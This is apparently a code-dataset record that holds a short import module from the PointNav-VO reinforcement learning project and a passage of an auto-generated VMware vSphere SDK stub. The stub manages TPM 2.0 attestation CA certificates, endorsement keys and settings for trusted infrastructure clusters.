| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
|
0
| 8
|
72c5b4f84eee7a4255278b49254946cd7d450872
| 265
|
py
|
Python
|
pointnav_vo/rl/__init__.py
|
rxlqn/PointNav-VO
|
6f7672482a3f1628a3b11025709518ee166e812b
|
[
"Apache-2.0"
] | 25
|
2021-08-28T04:06:31.000Z
|
2022-03-02T23:03:13.000Z
|
pointnav_vo/rl/__init__.py
|
rxlqn/PointNav-VO
|
6f7672482a3f1628a3b11025709518ee166e812b
|
[
"Apache-2.0"
] | 11
|
2021-10-01T07:03:11.000Z
|
2022-03-26T02:28:44.000Z
|
pointnav_vo/rl/__init__.py
|
rxlqn/PointNav-VO
|
6f7672482a3f1628a3b11025709518ee166e812b
|
[
"Apache-2.0"
] | 5
|
2021-09-01T09:05:42.000Z
|
2022-01-27T10:11:37.000Z
|
from pointnav_vo.rl.policies.resnet_policy import PointNavResNetPolicy
from pointnav_vo.rl.common.base_trainer import BaseTrainer, BaseRLTrainer
from pointnav_vo.rl.ppo.ppo_trainer import PPOTrainer
from pointnav_vo.rl.ddppo.algo.ddppo_trainer import DDPPOTrainer
| 44.166667
| 73
| 0.879245
| 38
| 265
| 5.921053
| 0.5
| 0.213333
| 0.248889
| 0.284444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067925
| 265
| 5
| 74
| 53
| 0.910931
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
72c71b05894423e8e1a9d85cc2f7a117e8bc26f8
| 66,970
|
py
|
Python
|
com/vmware/vcenter/trusted_infrastructure/trust_authority_clusters/attestation/tpm2_client.py
|
adammillerio/vsphere-automation-sdk-python
|
c07e1be98615201139b26c28db3aa584c4254b66
|
[
"MIT"
] | null | null | null |
com/vmware/vcenter/trusted_infrastructure/trust_authority_clusters/attestation/tpm2_client.py
|
adammillerio/vsphere-automation-sdk-python
|
c07e1be98615201139b26c28db3aa584c4254b66
|
[
"MIT"
] | null | null | null |
com/vmware/vcenter/trusted_infrastructure/trust_authority_clusters/attestation/tpm2_client.py
|
adammillerio/vsphere-automation-sdk-python
|
c07e1be98615201139b26c28db3aa584c4254b66
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#---------------------------------------------------------------------------
# Copyright 2020 VMware, Inc. All rights reserved.
# AUTO GENERATED FILE -- DO NOT MODIFY!
#
# vAPI stub file for package com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.
#---------------------------------------------------------------------------
"""
The
``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2_client``
module provides classes to manage remote attestation configuration for TPM
trust.
"""
__author__ = 'VMware, Inc.'
__docformat__ = 'restructuredtext en'
import sys
from com.vmware.cis_client import Tasks
from vmware.vapi.stdlib.client.task import Task
from vmware.vapi.bindings import type
from vmware.vapi.bindings.converter import TypeConverter
from vmware.vapi.bindings.enum import Enum
from vmware.vapi.bindings.error import VapiError
from vmware.vapi.bindings.struct import VapiStruct
from vmware.vapi.bindings.stub import (
ApiInterfaceStub, StubFactoryBase, VapiInterface)
from vmware.vapi.bindings.common import raise_core_exception
from vmware.vapi.data.validator import (UnionValidator, HasFieldsOfValidator)
from vmware.vapi.exception import CoreException
from vmware.vapi.lib.constants import TaskType
from vmware.vapi.lib.rest import OperationRestMetadata
class CaCertificates(VapiInterface):
    """
    The ``CaCertificates`` class provides methods to manage Trusted Platform
    Module (TPM) CA certificates.
    Endorsement Keys are typically packaged in a certificate that is signed by
    a certificate authority (CA). This class allows the CA certificate to be
    registered with the Attestation Service in order to validate TPM EK
    certificates when presented at attestation time.. This class was added in
    vSphere API 7.0.0.
    """
    RESOURCE_TYPE = "com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.CaCertificate"
    """
    Resource type for TPM 2.0 CA certificates. This class attribute was added in
    vSphere API 7.0.0.
    """
    _VAPI_SERVICE_ID = 'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.ca_certificates'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _CaCertificatesStub)
        # Map each *_task convenience method to its server-side $task
        # operation identifier.
        self._VAPI_OPERATION_IDS = {}
        self._VAPI_OPERATION_IDS.update({'list_task': 'list$task'})
        self._VAPI_OPERATION_IDS.update({'create_task': 'create$task'})
        self._VAPI_OPERATION_IDS.update({'delete_task': 'delete$task'})
        self._VAPI_OPERATION_IDS.update({'get_task': 'get$task'})

    class Health(Enum):
        """
        The ``CaCertificates.Health`` class is indicator for the consistency of the
        hosts status in the cluster. This enumeration was added in vSphere API
        7.0.0.
        .. note::
            This class represents an enumerated type in the interface language
            definition. The class contains class attributes which represent the
            values in the current version of the enumerated type. Newer versions of
            the enumerated type may contain new values. To use new values of the
            enumerated type in communication with a server that supports the newer
            version of the API, you instantiate this class. See :ref:`enumerated
            type description page <enumeration_description>`.
        """
        NONE = None
        """
        No status available. This class attribute was added in vSphere API 7.0.0.
        """
        OK = None
        """
        Each host in the cluster is in consistent state with the rest hosts in the
        cluster. This class attribute was added in vSphere API 7.0.0.
        """
        WARNING = None
        """
        Attestation is functioning, however there is an issue that requires
        attention. This class attribute was added in vSphere API 7.0.0.
        """
        ERROR = None
        """
        Not all hosts in the cluster are in consistent state. This class attribute
        was added in vSphere API 7.0.0.
        """
        def __init__(self, string):
            """
            :type string: :class:`str`
            :param string: String value for the :class:`Health` instance.
            """
            Enum.__init__(string)

    # Register the declared enum values and the canonical binding type
    # for Health (done after the class body, outside the class statement).
    Health._set_values([
        Health('NONE'),
        Health('OK'),
        Health('WARNING'),
        Health('ERROR'),
    ])
    Health._set_binding_type(type.EnumType(
        'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.ca_certificates.health',
        Health))

    class Summary(VapiStruct):
        """
        The ``CaCertificates.Summary`` class contains information that summarizes a
        TPM CA certificate. This class was added in vSphere API 7.0.0.
        .. tip::
            The arguments are used to initialize data attributes with the same
            names.
        """
        def __init__(self,
                     name=None,
                     health=None,
                    ):
            """
            :type name: :class:`str`
            :param name: A unique name for the TPM CA certificate. This attribute was added
                in vSphere API 7.0.0.
                When clients pass a value of this class as a parameter, the
                attribute must be an identifier for the resource type:
                ``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.CaCertificate``.
                When methods return a value of this class as a return value, the
                attribute will be an identifier for the resource type:
                ``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.CaCertificate``.
            :type health: :class:`CaCertificates.Health`
            :param health: A health indicator which indicates whether each host in the cluster
                has the same CA certs. This attribute was added in vSphere API
                7.0.0.
            """
            self.name = name
            self.health = health
            VapiStruct.__init__(self)

    # Canonical vAPI binding type for Summary.
    Summary._set_binding_type(type.StructType(
        'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.ca_certificates.summary', {
            'name': type.IdType(resource_types='com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.CaCertificate'),
            'health': type.ReferenceType(__name__, 'CaCertificates.Health'),
        },
        Summary,
        False,
        None))

    class Info(VapiStruct):
        """
        The ``CaCertificates.Info`` class contains information that describes a TPM
        CA certificate. This class was added in vSphere API 7.0.0.
        .. tip::
            The arguments are used to initialize data attributes with the same
            names.
        """
        def __init__(self,
                     cert_chain=None,
                     health=None,
                     details=None,
                    ):
            """
            :type cert_chain: :class:`com.vmware.vcenter.trusted_infrastructure_client.X509CertChain`
            :param cert_chain: The CA certificate chain. This attribute was added in vSphere API
                7.0.0.
            :type health: :class:`CaCertificates.Health`
            :param health: A health indicator which indicates whether each host in the cluster
                has the same CA certs. This attribute was added in vSphere API
                7.0.0.
            :type details: :class:`list` of :class:`com.vmware.vapi.std_client.LocalizableMessage`
            :param details: Details regarding the health.
                When the ``CaCertificates.Health`` is not
                :attr:`CaCertificates.Health.OK` or
                :attr:`CaCertificates.Health.NONE`, this member will provide an
                actionable description of the issues present.. This attribute was
                added in vSphere API 7.0.0.
            """
            self.cert_chain = cert_chain
            self.health = health
            self.details = details
            VapiStruct.__init__(self)

    # Canonical vAPI binding type for Info.
    Info._set_binding_type(type.StructType(
        'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.ca_certificates.info', {
            'cert_chain': type.ReferenceType('com.vmware.vcenter.trusted_infrastructure_client', 'X509CertChain'),
            'health': type.ReferenceType(__name__, 'CaCertificates.Health'),
            'details': type.ListType(type.ReferenceType('com.vmware.vapi.std_client', 'LocalizableMessage')),
        },
        Info,
        False,
        None))

    class CreateSpec(VapiStruct):
        """
        The ``CaCertificates.CreateSpec`` class contains information that describes
        a TPM CA certificate. This class was added in vSphere API 7.0.0.
        .. tip::
            The arguments are used to initialize data attributes with the same
            names.
        """
        def __init__(self,
                     name=None,
                     cert_chain=None,
                    ):
            """
            :type name: :class:`str`
            :param name: A unique name for the TPM CA certificate. This attribute was added
                in vSphere API 7.0.0.
                When clients pass a value of this class as a parameter, the
                attribute must be an identifier for the resource type:
                ``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.CaCertificate``.
                When methods return a value of this class as a return value, the
                attribute will be an identifier for the resource type:
                ``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.CaCertificate``.
            :type cert_chain: :class:`com.vmware.vcenter.trusted_infrastructure_client.X509CertChain` or ``None``
            :param cert_chain: The CA certificate chain.
                Certificates may either be added one at a time, or as a chain.
                Adding the certificates as a chain allows the group to be managed
                as a whole. For example, an entire chain can be deleted in one
                :func:`CaCertificates.delete` operation.
                When certificates are added one at a time, the order must be root
                first, followed by any intermediates. The intermediates
                certificates must also be ordered in the direction from root to
                leaf.
                Similarly, when added as a chain the list must be ordered in the
                direction from root to leaf.. This attribute was added in vSphere
                API 7.0.0.
                If None creation will fail.
            """
            self.name = name
            self.cert_chain = cert_chain
            VapiStruct.__init__(self)

    # Canonical vAPI binding type for CreateSpec.
    CreateSpec._set_binding_type(type.StructType(
        'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.ca_certificates.create_spec', {
            'name': type.IdType(resource_types='com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.CaCertificate'),
            'cert_chain': type.OptionalType(type.ReferenceType('com.vmware.vcenter.trusted_infrastructure_client', 'X509CertChain')),
        },
        CreateSpec,
        False,
        None))

    def list_task(self,
                  cluster,
                  ):
        """
        Return a list of configured TPM CA certificates on a cluster. This
        method was added in vSphere API 7.0.0.
        :type cluster: :class:`str`
        :param cluster: The id of the cluster on which the operation will be executed.
            The parameter must be an identifier for the resource type:
            ``ClusterComputeResource``.
        :rtype: :class: `vmware.vapi.stdlib.client.task.Task`
        :return: Task instance
        :raise: :class:`com.vmware.vapi.std.errors_client.Error`
            if there is a generic error.
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
            if cluster id is empty.
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            if the ``cluster`` doesn't match to any cluster in the vCenter or
            given name is not found.
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthenticated`
            if the caller is not authenticated.
        """
        task_id = self._invoke('list$task',
                               {
                               'cluster': cluster,
                               })
        task_svc = Tasks(self._config)
        task_instance = Task(task_id, task_svc, type.ListType(type.ReferenceType(__name__, 'CaCertificates.Summary')))
        return task_instance

    def create_task(self,
                    cluster,
                    spec,
                    ):
        """
        Add a new TPM CA certificate on a cluster. This method was added in
        vSphere API 7.0.0.
        :type cluster: :class:`str`
        :param cluster: The id of the cluster on which the operation will be executed.
            The parameter must be an identifier for the resource type:
            ``ClusterComputeResource``.
        :type spec: :class:`CaCertificates.CreateSpec`
        :param spec: The new CA certificate details.
        :raise: :class:`com.vmware.vapi.std.errors_client.AlreadyExists`
            if the certificate name exists.
        :raise: :class:`com.vmware.vapi.std.errors_client.Error`
            if there is a generic error.
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
            if the configuration is invalid or the cluster id is empty.
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            if ``cluster`` doesn't match to any cluster in the vCenter.
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthenticated`
            if the caller is not authenticated.
        """
        task_id = self._invoke('create$task',
                               {
                               'cluster': cluster,
                               'spec': spec,
                               })
        task_svc = Tasks(self._config)
        task_instance = Task(task_id, task_svc, type.VoidType())
        return task_instance

    def delete_task(self,
                    cluster,
                    name,
                    ):
        """
        Remove a TPM CA certificate on a cluster. This method was added in
        vSphere API 7.0.0.
        :type cluster: :class:`str`
        :param cluster: The id of the cluster on which the operation will be executed.
            The parameter must be an identifier for the resource type:
            ``ClusterComputeResource``.
        :type name: :class:`str`
        :param name: The CA certificate name.
            The parameter must be an identifier for the resource type:
            ``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.CaCertificate``.
        :raise: :class:`com.vmware.vapi.std.errors_client.Error`
            if there is a generic error.
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
            if the name is invalid or cluster id is empty.
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            if the ``cluster`` doesn't match to any cluster in the vCenter or
            given name is not found.
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthenticated`
            if the caller is not authenticated.
        """
        task_id = self._invoke('delete$task',
                               {
                               'cluster': cluster,
                               'name': name,
                               })
        task_svc = Tasks(self._config)
        task_instance = Task(task_id, task_svc, type.VoidType())
        return task_instance

    def get_task(self,
                 cluster,
                 name,
                 ):
        """
        Get the TPM CA certificate details on a cluster. This method was added
        in vSphere API 7.0.0.
        :type cluster: :class:`str`
        :param cluster: The id of the cluster on which the operation will be executed.
            The parameter must be an identifier for the resource type:
            ``ClusterComputeResource``.
        :type name: :class:`str`
        :param name: The CA certificate name.
            The parameter must be an identifier for the resource type:
            ``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.CaCertificate``.
        :rtype: :class: `vmware.vapi.stdlib.client.task.Task`
        :return: Task instance
        :raise: :class:`com.vmware.vapi.std.errors_client.Error`
            if there is a generic error.
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
            if the name is invalid or cluster id is empty.
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            if the CA certificate is not found or ``cluster`` doesn't match to
            any cluster in the vCenter.
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthenticated`
            if the caller is not authenticated.
        """
        task_id = self._invoke('get$task',
                               {
                               'cluster': cluster,
                               'name': name,
                               })
        task_svc = Tasks(self._config)
        task_instance = Task(task_id, task_svc, type.ReferenceType(__name__, 'CaCertificates.Info'))
        return task_instance
class EndorsementKeys(VapiInterface):
    """
    The ``EndorsementKeys`` class provides methods to manage Trusted Platform
    Module (TPM) Endorsement Keys (EK) on a cluster level. This class was added
    in vSphere API 7.0.0.
    """
    RESOURCE_TYPE = "com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.EndorsementKey"
    """
    Resource type for TPM 2.0 endorsement keys. This class attribute was added in
    vSphere API 7.0.0.
    """
    _VAPI_SERVICE_ID = 'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.endorsement_keys'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _EndorsementKeysStub)
        # Map each *_task convenience method to its server-side $task
        # operation identifier.
        self._VAPI_OPERATION_IDS = {}
        self._VAPI_OPERATION_IDS.update({'list_task': 'list$task'})
        self._VAPI_OPERATION_IDS.update({'create_task': 'create$task'})
        self._VAPI_OPERATION_IDS.update({'delete_task': 'delete$task'})
        self._VAPI_OPERATION_IDS.update({'get_task': 'get$task'})

    class Health(Enum):
        """
        The ``EndorsementKeys.Health`` class is indicator for the consistency of
        the hosts status in the cluster. This enumeration was added in vSphere API
        7.0.0.
        .. note::
            This class represents an enumerated type in the interface language
            definition. The class contains class attributes which represent the
            values in the current version of the enumerated type. Newer versions of
            the enumerated type may contain new values. To use new values of the
            enumerated type in communication with a server that supports the newer
            version of the API, you instantiate this class. See :ref:`enumerated
            type description page <enumeration_description>`.
        """
        NONE = None
        """
        No status available. This class attribute was added in vSphere API 7.0.0.
        """
        OK = None
        """
        Each host in the cluster is in consistent state with the rest hosts in the
        cluster. This class attribute was added in vSphere API 7.0.0.
        """
        WARNING = None
        """
        Attestation is functioning, however there is an issue that requires
        attention. This class attribute was added in vSphere API 7.0.0.
        """
        ERROR = None
        """
        Not all hosts in the cluster are in consistent state. This class attribute
        was added in vSphere API 7.0.0.
        """
        def __init__(self, string):
            """
            :type string: :class:`str`
            :param string: String value for the :class:`Health` instance.
            """
            Enum.__init__(string)

    # Register the declared enum values and the canonical binding type
    # for Health (done after the class body, outside the class statement).
    Health._set_values([
        Health('NONE'),
        Health('OK'),
        Health('WARNING'),
        Health('ERROR'),
    ])
    Health._set_binding_type(type.EnumType(
        'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.endorsement_keys.health',
        Health))

    class Summary(VapiStruct):
        """
        The ``EndorsementKeys.Summary`` class contains information that summarizes
        a TPM endorsement key. This class was added in vSphere API 7.0.0.
        .. tip::
            The arguments are used to initialize data attributes with the same
            names.
        """
        def __init__(self,
                     name=None,
                     health=None,
                    ):
            """
            :type name: :class:`str`
            :param name: A unique name for the TPM endorsement key. This attribute was added
                in vSphere API 7.0.0.
                When clients pass a value of this class as a parameter, the
                attribute must be an identifier for the resource type:
                ``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.EndorsementKey``.
                When methods return a value of this class as a return value, the
                attribute will be an identifier for the resource type:
                ``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.EndorsementKey``.
            :type health: :class:`EndorsementKeys.Health`
            :param health: A health indicator which indicates whether each host in the cluster
                has the same endorsement key. This attribute was added in vSphere
                API 7.0.0.
            """
            self.name = name
            self.health = health
            VapiStruct.__init__(self)

    # Canonical vAPI binding type for Summary.
    Summary._set_binding_type(type.StructType(
        'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.endorsement_keys.summary', {
            'name': type.IdType(resource_types='com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.EndorsementKey'),
            'health': type.ReferenceType(__name__, 'EndorsementKeys.Health'),
        },
        Summary,
        False,
        None))

    class Info(VapiStruct):
        """
        The ``EndorsementKeys.Info`` class contains information that describes a
        TPM endorsement key. This class was added in vSphere API 7.0.0.
        .. tip::
            The arguments are used to initialize data attributes with the same
            names.
        """
        def __init__(self,
                     public_key=None,
                     health=None,
                     details=None,
                    ):
            """
            :type public_key: :class:`str`
            :param public_key: TPM public endorsement key in PEM format. This attribute was added
                in vSphere API 7.0.0.
            :type health: :class:`EndorsementKeys.Health`
            :param health: A health indicator which indicates whether each host in the cluster
                has the same endorsement key. This attribute was added in vSphere
                API 7.0.0.
            :type details: :class:`list` of :class:`com.vmware.vapi.std_client.LocalizableMessage`
            :param details: Details regarding the health.
                When the ``EndorsementKeys.Health`` is not
                :attr:`EndorsementKeys.Health.OK` or
                :attr:`EndorsementKeys.Health.NONE`, this member will provide an
                actionable description of the issues present.. This attribute was
                added in vSphere API 7.0.0.
            """
            self.public_key = public_key
            self.health = health
            self.details = details
            VapiStruct.__init__(self)

    # Canonical vAPI binding type for Info.
    Info._set_binding_type(type.StructType(
        'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.endorsement_keys.info', {
            'public_key': type.StringType(),
            'health': type.ReferenceType(__name__, 'EndorsementKeys.Health'),
            'details': type.ListType(type.ReferenceType('com.vmware.vapi.std_client', 'LocalizableMessage')),
        },
        Info,
        False,
        None))

    class CreateSpec(VapiStruct):
        """
        The ``EndorsementKeys.CreateSpec`` class contains information that
        describes a TPM endorsement key.
        Only one of :attr:`EndorsementKeys.CreateSpec.public_key` or
        :attr:`EndorsementKeys.CreateSpec.certificate` must be specified.. This
        class was added in vSphere API 7.0.0.
        .. tip::
            The arguments are used to initialize data attributes with the same
            names.
        """
        def __init__(self,
                     name=None,
                     public_key=None,
                     certificate=None,
                    ):
            """
            :type name: :class:`str`
            :param name: A unique name for the TPM endorsement key.
                The unique name should be something that an administrator can use
                to easily identify the remote system. For example, the hostname, or
                hardware UUID.. This attribute was added in vSphere API 7.0.0.
                When clients pass a value of this class as a parameter, the
                attribute must be an identifier for the resource type:
                ``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.EndorsementKey``.
                When methods return a value of this class as a return value, the
                attribute will be an identifier for the resource type:
                ``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.EndorsementKey``.
            :type public_key: :class:`str` or ``None``
            :param public_key: TPM public endorsement key in PEM format. This attribute was added
                in vSphere API 7.0.0.
                If None :attr:`EndorsementKeys.CreateSpec.certificate` must be
                :class:`set`.
            :type certificate: :class:`str` or ``None``
            :param certificate: TPM endorsement key certificate in PEM format.
                When a endorsement key certificate is provided, it will be verified
                against the CA certificate list. Endorsement key certificates that
                are not signed by one of the CA certificates will be rejected.
                Using this format allows for failures to be caught during
                configuration rather than later during attestation.. This attribute
                was added in vSphere API 7.0.0.
                If None :attr:`EndorsementKeys.CreateSpec.public_key` must be
                :class:`set`.
            """
            self.name = name
            self.public_key = public_key
            self.certificate = certificate
            VapiStruct.__init__(self)

    # Canonical vAPI binding type for CreateSpec.
    CreateSpec._set_binding_type(type.StructType(
        'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.endorsement_keys.create_spec', {
            'name': type.IdType(resource_types='com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.EndorsementKey'),
            'public_key': type.OptionalType(type.StringType()),
            'certificate': type.OptionalType(type.StringType()),
        },
        CreateSpec,
        False,
        None))

    def list_task(self,
                  cluster,
                  ):
        """
        Return a list of configured TPM endorsement keys in a cluster. This
        method was added in vSphere API 7.0.0.
        :type cluster: :class:`str`
        :param cluster: The id of the cluster on which the operation will be executed.
            The parameter must be an identifier for the resource type:
            ``ClusterComputeResource``.
        :rtype: :class: `vmware.vapi.stdlib.client.task.Task`
        :return: Task instance
        :raise: :class:`com.vmware.vapi.std.errors_client.Error`
            if there is a generic error.
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
            if the cluster id is empty.
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            if the cluster is not found.
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthenticated`
            if the caller is not authenticated.
        """
        task_id = self._invoke('list$task',
                               {
                               'cluster': cluster,
                               })
        task_svc = Tasks(self._config)
        task_instance = Task(task_id, task_svc, type.ListType(type.ReferenceType(__name__, 'EndorsementKeys.Summary')))
        return task_instance

    def create_task(self,
                    cluster,
                    spec,
                    ):
        """
        Add a new TPM endorsement key on a cluster. This method was added in
        vSphere API 7.0.0.
        :type cluster: :class:`str`
        :param cluster: The id of the cluster on which the operation will be executed.
            The parameter must be an identifier for the resource type:
            ``ClusterComputeResource``.
        :type spec: :class:`EndorsementKeys.CreateSpec`
        :param spec: The configuration.
        :raise: :class:`com.vmware.vapi.std.errors_client.AlreadyExists`
            if the endorsement key name exists.
        :raise: :class:`com.vmware.vapi.std.errors_client.Error`
            if there is a generic error.
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
            if the configuration is invalid or cluster id is empty.
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            if ``cluster`` doesn't match to any cluster in the vCenter.
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthenticated`
            if the caller is not authenticated.
        """
        task_id = self._invoke('create$task',
                               {
                               'cluster': cluster,
                               'spec': spec,
                               })
        task_svc = Tasks(self._config)
        task_instance = Task(task_id, task_svc, type.VoidType())
        return task_instance

    def delete_task(self,
                    cluster,
                    name,
                    ):
        """
        Remove a TPM endorsement key on a cluster. This method was added in
        vSphere API 7.0.0.
        :type cluster: :class:`str`
        :param cluster: The id of the cluster on which the operation will be executed.
            The parameter must be an identifier for the resource type:
            ``ClusterComputeResource``.
        :type name: :class:`str`
        :param name: The endorsement key name.
            The parameter must be an identifier for the resource type:
            ``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.EndorsementKey``.
        :raise: :class:`com.vmware.vapi.std.errors_client.Error`
            if there is a generic error.
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
            if the name is invalid or cluster id is empty.
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            if the name is not found or ``cluster`` doesn't match to any
            cluster in the vCenter.
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthenticated`
            if the caller is not authenticated.
        """
        task_id = self._invoke('delete$task',
                               {
                               'cluster': cluster,
                               'name': name,
                               })
        task_svc = Tasks(self._config)
        task_instance = Task(task_id, task_svc, type.VoidType())
        return task_instance

    def get_task(self,
                 cluster,
                 name,
                 ):
        """
        Get the TPM endorsement key details on a cluster. This method was added
        in vSphere API 7.0.0.
        :type cluster: :class:`str`
        :param cluster: The id of the cluster on which the operation will be executed.
            The parameter must be an identifier for the resource type:
            ``ClusterComputeResource``.
        :type name: :class:`str`
        :param name: The endorsement key name.
            The parameter must be an identifier for the resource type:
            ``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.EndorsementKey``.
        :rtype: :class: `vmware.vapi.stdlib.client.task.Task`
        :return: Task instance
        :raise: :class:`com.vmware.vapi.std.errors_client.Error`
            if there is a generic error.
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
            if the name is invalid or cluster id is empty.
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            if the endorsement key is not found or ``cluster`` doesn't match to
            any cluster in the vCenter.
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthenticated`
            if the caller is not authenticated.
        """
        task_id = self._invoke('get$task',
                               {
                               'cluster': cluster,
                               'name': name,
                               })
        task_svc = Tasks(self._config)
        task_instance = Task(task_id, task_svc, type.ReferenceType(__name__, 'EndorsementKeys.Info'))
        return task_instance
class Settings(VapiInterface):
    """
    The ``Settings`` interface provides methods to get or update settings
    related to the TPM 2.0 attestation protocol behavior. This class was added
    in vSphere API 7.0.0.
    """

    # Canonical vAPI service identifier; must match the server-side service
    # definition exactly.
    _VAPI_SERVICE_ID = 'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.settings'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _SettingsStub)
        # Map the public *_task method names onto the '$task' operation ids
        # declared in _SettingsStub so the base class can dispatch them.
        self._VAPI_OPERATION_IDS = {}
        self._VAPI_OPERATION_IDS.update({'get_task': 'get$task'})
        self._VAPI_OPERATION_IDS.update({'update_task': 'update$task'})

    class Health(Enum):
        """
        The ``Settings.Health`` class is indicator for the consistency of the hosts
        status in the cluster. This enumeration was added in vSphere API 7.0.0.

        .. note::
            This class represents an enumerated type in the interface language
            definition. The class contains class attributes which represent the
            values in the current version of the enumerated type. Newer versions of
            the enumerated type may contain new values. To use new values of the
            enumerated type in communication with a server that supports the newer
            version of the API, you instantiate this class. See :ref:`enumerated
            type description page <enumeration_description>`.
        """
        # The attributes start out as None; the real Health instances are
        # installed by the Health._set_values(...) call below, which runs
        # right after this class body finishes executing.
        NONE = None
        """
        No status available. This class attribute was added in vSphere API 7.0.0.
        """
        OK = None
        """
        Each host in the cluster is in consistent state with the rest hosts in the
        cluster. This class attribute was added in vSphere API 7.0.0.
        """
        WARNING = None
        """
        Attestation is functioning, however there is an issue that requires
        attention. This class attribute was added in vSphere API 7.0.0.
        """
        ERROR = None
        """
        Not all hosts in the cluster are in consistent state. This class attribute
        was added in vSphere API 7.0.0.
        """

        def __init__(self, string):
            """
            :type string: :class:`str`
            :param string: String value for the :class:`Health` instance.
            """
            Enum.__init__(string)

    # Populate the enum values and register the wire-level enum binding;
    # these calls execute at Settings class-definition time and must run in
    # this order (values before binding type).
    Health._set_values([
        Health('NONE'),
        Health('OK'),
        Health('WARNING'),
        Health('ERROR'),
    ])
    Health._set_binding_type(type.EnumType(
        'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.settings.health',
        Health))

    class Info(VapiStruct):
        """
        The ``Settings.Info`` class contains information that describes the TPM 2.0
        protocol settings. This class was added in vSphere API 7.0.0.

        .. tip::
            The arguments are used to initialize data attributes with the same
            names.
        """

        def __init__(self,
                     require_endorsement_keys=None,
                     require_certificate_validation=None,
                     health=None,
                     details=None,
                    ):
            """
            :type require_endorsement_keys: :class:`bool`
            :param require_endorsement_keys: Require registered TPM endorsement keys.
